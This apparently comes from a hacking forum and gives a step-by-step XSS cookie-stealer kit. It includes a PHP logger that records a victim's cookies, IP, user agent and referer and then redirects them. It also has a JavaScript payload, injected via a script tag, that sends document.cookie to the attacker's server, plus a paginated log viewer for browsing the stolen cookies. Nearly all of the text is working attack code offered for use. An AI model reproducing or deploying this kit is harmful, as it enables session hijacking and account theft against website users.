stallation steps :

1 ) logger
( logger.php )


code:
<?php
$cookie = $http_get_vars["cookie"];
$date = date ("j f y h:i:s a");
$ip = $_server['remote_addr'];
$agent = $_server['http_user_agent'];
$referer = $_server['http_referer'];
$file = fopen('logs.html', 'a');
fwrite($file, "<tr><td>\n <font color='#990000' ><b>\n cookies : </b></font>$cookie <br>\n<font color='#990000' ><b> date : </b></font> $date <br>\n <font color='#990000' ><b> ip : </b></font> $ip <br>\n<font color='#990000' ><b>\n referer : </b></font>$referer <br>\n<font color='#990000' ><b> agent : </b></font> $agent <br>\n<hr><hr><br>\n</td></tr>\n");
fclose($file);
header( 'location: http://www.redirecturl.com' ) ;
?>
2 ) js logger
( logger.js )
this to insert it in your xss directly through

code:
<script src=http://www.yourwebsite.com/logger.js>
code:
location.href = 'http://youwebsite.com/logger.php?cookie='+encodeuricomponent(document.co okie);
3 ) cookie logs page[*]make a blank logs.html page[*] ( logs.php )

code:
<!-- if you wanna highlight a specific words -->

<script type="text/javascript" src="highlight.js"></script>
<body onload="highlightsearchterms('word1');highlightsea rchterms('word2');highlightsearchterms​('word3')">

<head>
<style type="text/css">

body
{
overflow:visible;
}
.pg-normal {
color: black;
font-weight: normal;
text-decoration: none;
cursor: pointer;
}
.pg-selected {
color: black;
font-weight: bold;
text-decoration: underline;
cursor: pointer;
}
</style>

<script type="text/javascript" src="page.js"></script>
</head>
<body>
<center><div id="pagenavposition"></div></center><br><hr>
<form action="" method="get" enctype="application/x-www-form-urlencoded">
<table id="results">
<tr>
<th></th>
<th></th>
</tr>

<?php include 'logs.html'; ?>

</table>
</form>

<script type="text/javascript"><!--
var pager = new pager('results', 10);
pager.init();
pager.showpagenav('pager', 'pagenavposition');
pager.showpage(1);
//--></script>

</body>
</html>[*]page.js [for pagination ]

code:
function pager(tablename, itemsperpage) {
this.tablename = tablename;
this.itemsperpage = itemsperpage;
this.currentpage = 1;
this.pages = 0;
this.inited = false;

this.showrecords = function(from, to) {
var rows = document.getelementbyid(tablename).rows;
// i starts from 1 to skip table header row
for (var i = 1; i < rows.length; i++) {
if (i < from || i > to)
rows[i].style.display = 'none';
else
rows[i].style.display = '';
}
}

this.showpage = function(pagenumber) {
if (! this.inited) {
alert("not inited");
return;
}

var oldpageanchor = document.getelementbyid('pg'+this.currentpage);
oldpageanchor.classname = 'pg-normal';

this.currentpage = pagenumber;
var newpageanchor = document.getelementbyid('pg'+this.currentpage);
newpageanchor.classname = 'pg-selected';

var from = (pagenumber - 1) * itemsperpage + 1;
var to = from + itemsperpage - 1;
this.showrecords(from, to);
}

this.prev = function() {
if (this.currentpage > 1)
this.showpage(this.currentpage - 1);
}

this.next = function() {
if (this.currentpage < this.pages) {
this.showpage(this.currentpage + 1);
}
}

this.init = function() {
var rows = document.getelementbyid(tablename).rows;
var records = (rows.length - 1);
this.pages = math.ceil(records / itemsperpage);
this.inited = true;
}

this.showpagenav = function(pagername, positionid) {
if (! this.inited) {
alert("not inited");
return;
}
var element = document.getelementbyid(positionid);

var pagerhtml = '<span onclick="' + pagername + '.prev();" class="pg-normal"> prev </span> | ';
for (var page = 1; page <= this.pages; page++)
pagerhtml += '<span id="pg' + page + '" class="pg-normal" onclick="' + pagername + '.showpage(' + page + ');">' + page + '</span> | ';
pagerhtml += '<span onclick="'+pagername+'.next();" class="pg-normal"> next </span>';

element.innerhtml = pagerhtml;
}
}[*]highlight.js [ optional ]
this to highlight specific words as its written at the top of logs.php page


code:
function dohighlight(bodytext, searchterm, highlightstarttag, highlightendtag)
{
// the highlightstarttag and highlightendtag parameters are optional
if ((!highlightstarttag) || (!highlightendtag)) {
highlightstarttag = "<font style='color:blue; background-color:yellow;'><b>";
highlightendtag = "</font></b>";
}
var newtext = "";
var i = -1;
var lcsearchterm = searchterm.tolowercase();
var lcbodytext = bodytext.tolowercase();

while (bodytext.length > 0) {
i = lcbodytext.indexof(lcsearchterm, i+1);
if (i < 0) {
newtext += bodytext;
bodytext = "";
} else {
// skip anything inside an html tag
if (bodytext.lastindexof(">", i) >= bodytext.lastindexof("<", i)) {
// skip anything inside a <script> block
if (lcbodytext.lastindexof("/script>", i) >= lcbodytext.lastindexof("<script", i)) {
newtext += bodytext.substring(0, i) + highlightstarttag + bodytext.substr(i, searchterm.length) + highlightendtag;
bodytext = bodytext.substr(i + searchterm.length);
lcbodytext = bodytext.tolowercase();
i = -1;
}
}
}
}

return newtext;
}

function highlightsearchterms(searchtext, treatasphrase, warnonfailure, highlightstarttag, highlightendtag)
{
if (treatasphrase) {
searcharray = [searchtext];
} else {
searcharray = searchtext.split(" ");
}

if (!document.body || typeof(document.body.innerhtml) == "undefined") {
if (warnonfailure) {
alert("sorry, for some reason the text of this page is unavailable. searching will not work.");
}
return false;
}

var bodytext = document.body.innerhtml;
for (var i = 0; i < searcharray.length; i++) {
bodytext = dohighlight(bodytext, searcharray[i], highlightstarttag, highlightendtag);
}

document.body.innerhtml = bodytext;
return true;
}

/*
* this displays a dialog box that allows a user to enter their own
* search terms to highlight on the page, and then passes the search
* text or phrase to the highlightsearchterms function. all parameters
* are optional.
*/
function searchprompt(defaulttext, treatasphrase, textcolor, bgcolor)
{
// this function prompts the user for any words that should
// be highlighted on this web page
if (!defaulttext) {
defaulttext = "";
}

// we can optionally use our own highlight tag values
if ((!textcolor) || (!bgcolor)) {
highlightstarttag = "";
highlightendtag = "";
} else {
highlightstarttag = "<font style='color:" + textcolor + "; background-color:" + bgcolor + ";'>";
highlightendtag = "</font>";
}

if (treatasphrase) {
prompttext = "please enter the phrase you'd like to search for:";
} else {
prompttext = "please enter the words you'd like to search for, separated by spaces:";
}

searchtext = prompt(prompttext, defaulttext);

if (!searchtext) {
alert("no search terms were entered. exiting function.");
return false;
}

return highlightsearchterms(searchtext, treatasphrase, true, highlightstarttag, highlightendtag);
}

/*
* this function takes a referer/referrer string and parses it
* to determine if it contains any search terms. if it does, the
* search terms are passed to the highlightsearchterms function
* so they can be highlighted on the current page.
*/
function highlightgooglesearchterms(referrer)
{
// this function has only been very lightly tested against
// typical google search urls. if you wanted the google search
// terms to be automatically highlighted on a page, you could
// call the function in the onload event of your <body> tag,
// like this:
// <body onload='highlightgooglesearchterms(document.referr er);'>

//var referrer = document.referrer;
if (!referrer) {
return false;
}

var queryprefix = "q=";
var startpos = referrer.tolowercase().indexof(queryprefix);
if ((startpos < 0) || (startpos + queryprefix.length == referrer.length)) {
return false;
}

var endpos = referrer.indexof("&", startpos);
if (endpos < 0) {
endpos = referrer.length;
}

var querystring = referrer.substring(startpos + queryprefix.length, endpos);
// fix the space characters
querystring = querystring.replace(/%20/gi, " ");
querystring = querystring.replace(/\+/gi, " ");
// remove the quotes (if you're really creative, you could search for the
// terms within the quotes as phrases, and everything else as single terms)
querystring = querystring.replace(/%22/gi, "");
querystring = querystring.replace(/\"/gi, "");

return highlightsearchterms(querystring, false);
}

/*
* this function is just an easy way to test the highlightgooglesearchterms
* function.
*/
function testhighlightgooglesearchterms()
{
var referrerstring = "http://www.google.com/search?q=javascript%20highlight&start=0";
referrerstring = prompt("test the following referrer string:", referrerstring);
return highlightgooglesearchterms(referrerstring);
}

and finally you can view your cookies

and finally you can view your cookies through logs.php pirate !

see yaa